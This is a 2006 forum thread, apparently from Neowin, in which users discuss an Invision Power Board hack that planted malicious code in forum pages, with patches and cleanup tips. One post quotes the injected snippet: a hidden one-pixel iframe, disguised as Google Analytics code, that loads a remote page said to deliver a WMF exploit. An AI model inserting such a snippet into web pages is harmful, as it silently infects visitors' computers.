John Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 Well Neowin is hardly the only Invision board out there; I'm sure other boards will be hacked (and probably are being hacked right now). Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 IPB has been used as a door to access to the server, but in fact that WMF loader was added also to my WordPress setup at www.zipgenius.it. Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 Crazy! Link to comment Share on other sites More sharing options...
Japlabot Posted July 8, 2006 Share Posted July 8, 2006 I'm looking at the exploit at the remote website. Whoever wrote it has gone to a lot of trouble for obscure their code. Link to comment Share on other sites More sharing options...
John Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 I'm looking at the exploit at the remote website. Whoever wrote it has gone to a lot of trouble for obscure their code. I was noticing that too. I downloaded the code and tried to unobfuscate it, and it's still really difficult to see what it's doing. Link to comment Share on other sites More sharing options...
TimRogers Posted July 8, 2006 Share Posted July 8, 2006 LOL. Trend Micro had a spasm on that page :p Anyone worked out what it does yet? When someone does, it should be posted on the front page as a warning. Link to comment Share on other sites More sharing options...
CaptainSlow Posted July 8, 2006 Share Posted July 8, 2006 Hey, this happened on my site too. I was looking for a fix of some sort yesterday and found this... http://www.ipsbeyond.com/forums/index.php?showtopic=9706 There's a little explanation on how your forums got hacked and a very useful tool called "Ipb 2.1 Anti-virus Tool", It scans for suspicous files in your IPB directory and puts them in a list, however you have to delete them manually. Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 Hey, this happened on my site too.I was looking for a fix of some sort yesterday and found this... http://www.ipsbeyond.com/forums/index.php?showtopic=9706 There's a little explanation on how your forums got hacked and a very useful tool called "Ipb 2.1 Anti-virus Tool", It scans for suspicous files in your IPB directory and puts them in a list, however you have to delete them manually. Good find :) Link to comment Share on other sites More sharing options...
CaptainSlow Posted July 8, 2006 Share Posted July 8, 2006 Just thought I would add that i'm getting the antivirus warnings again (as mentioned earlier in this thread). Link to comment Share on other sites More sharing options...
aos101 Posted July 8, 2006 Share Posted July 8, 2006 Yes its back again, this time towards the bottom of the HTML source :( : <!-- Start of Google analytics--> <script src="https://www.google-analytics.com/urchin.js" type="text/javascript"> </script> <script type="text/javascript"> _uacct = "UA-128683-1"; urchinTracker(); </script> <div style="VISIBILITY: hidden; POSITION: absolute"> <iframe src="https://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe> </div> <!-- End of Google analytics --> Link to comment Share on other sites More sharing options...
accesser Posted July 8, 2006 Share Posted July 8, 2006 ^I added it to the restricted url list in IE7 as suggested no problems since then before i was getting the popup that I posted in a screen capture above. Link to comment Share on other sites More sharing options...
Bobster Posted July 8, 2006 Share Posted July 8, 2006 And to everyone who doesn't like OneCare, it is having a fit everytime I go on the forums on IE7! :p Firefox keeps me safe though *hugs Firefox* :wub: Link to comment Share on other sites More sharing options...
tomwarren Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 Invisions code is getting as sloppy as Microsofts :| Link to comment Share on other sites More sharing options...
Aokromes Posted July 8, 2006 Share Posted July 8, 2006 Hi, the xploit is fixed on the last ipb 2.1.6 of 30 of June, the crap is located at ipb skin, use Generate Differences Report... at admin control panel to find it. It's somewhere at template html, at global html global_board_header > skin_global. Link to comment Share on other sites More sharing options...
chrismaddern Posted July 8, 2006 Share Posted July 8, 2006 Eeep.. it's back. The same iFrame code. Argh.. this is going to keep happening isn't it!? Chris Link to comment Share on other sites More sharing options...
chopyaedoff Posted July 8, 2006 Share Posted July 8, 2006 Luckily I applied this update yesterday - http://forums.invisionpower.com/index.php?showtopic=220787 And my forums may not be at risk as much as they don't have (Powered by Invision Power Board) in the title. Link to comment Share on other sites More sharing options...
Stunna Posted July 8, 2006 Share Posted July 8, 2006 That code tries to load a remote malfomed .WMF file in order to hit unpatched Windows system. so most people are safe from this, if you update your windows frequently? How is vista and IE7+ handling this? Link to comment Share on other sites More sharing options...
+Elі Subscriber² Posted July 8, 2006 Subscriber² Share Posted July 8, 2006 It's not affecting IE7 under Vista at all, I have not tested on IE7 with XP though. Link to comment Share on other sites More sharing options...
Phalesafe Posted July 8, 2006 Share Posted July 8, 2006 I'm not having any probs, fixed it perhaps? Link to comment Share on other sites More sharing options...
Rowain Posted July 8, 2006 Share Posted July 8, 2006 Hi, the xploit is fixed on the last ipb 2.1.6 of 30 of June, the crap is located at ipb skin, use Generate Differences Report... at admin control panel to find it. It's somewhere at template html, at global html global_board_header > skin_global. When the forum of the site in my sig was hit by this same exploit, the code was found in the config file. Deleting it from skin_global in the ACP did nothing. Link to comment Share on other sites More sharing options...
The_Decryptor Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 Yay for IPB and IE :rolleyes: . It's time like this that make me glad i don't use IE, or Windows (unless forced of course). Link to comment Share on other sites More sharing options...
Stunna Posted July 8, 2006 Share Posted July 8, 2006 is there a way to find out if you have been infected? Link to comment Share on other sites More sharing options...
Nashy Posted July 8, 2006 Share Posted July 8, 2006 Yay for IPB and IE :rolleyes: .It's time like this that make me glad i don't use IE, or Windows (unless forced of course). This isn't a thread to bash a good operating system though ;) is there a way to find out if you have been infected? Virus Scan. Link to comment Share on other sites More sharing options...
Kane Posted July 8, 2006 Share Posted July 8, 2006 Yay for IPB and IE :rolleyes: . It's time like this that make me glad i don't use IE, or Windows (unless forced of course). This isnt a thread for bashing, lets get back to the topic at hand. Thanks. Link to comment Share on other sites More sharing options...
lerum Posted July 8, 2006 Share Posted July 8, 2006 This isnt a thread for bashing, lets get back to the topic at hand. Thanks. Didn't know you were a mod. On topic- You had me worried as I have no virus scanner till I read that it didn't work in firefox *pets firefox* :D Link to comment Share on other sites More sharing options...
Recommended Posts